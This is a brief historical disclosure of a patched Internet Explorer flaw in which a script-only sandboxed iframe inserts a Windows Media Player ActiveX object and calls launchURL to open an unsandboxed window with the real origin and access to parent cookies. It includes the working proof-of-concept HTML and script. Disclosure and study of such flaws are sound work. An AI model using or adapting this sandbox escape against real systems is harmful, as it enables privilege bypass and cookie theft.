A sandboxed iframe restricted to only allow-scripts could open a fully unsandboxed window by inserting a Windows Media Player ActiveX object and calling its launchURL method. The new window opened with the real page origin and no sandbox restrictions.

<!-- parent page -->
<iframe sandbox="allow-scripts" src="sandboxed.html"></iframe>
<script>
document.cookie = "COOKIE WAS SET = BY THE MAIN WINDOW";
</script>
<!-- sandboxed.html -->
<script>
var strWMP = '<object id="oWMP" classid="clsid:6BF52A52-394A-11d3-B153-00C04F79FAA6"></object>';
document.body.insertAdjacentHTML('beforeEnd', strWMP);
document.all.oWMP.launchURL("out-of-sandbox.html"); // This window will be out of the SandBox.
</script>

The Windows Media Player COM object’s launchURL method opened a new browser window through a path that the sandbox did not intercept. The opened page ran with full origin privileges, could read cookies set by the parent, and had no sandbox flags applied.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.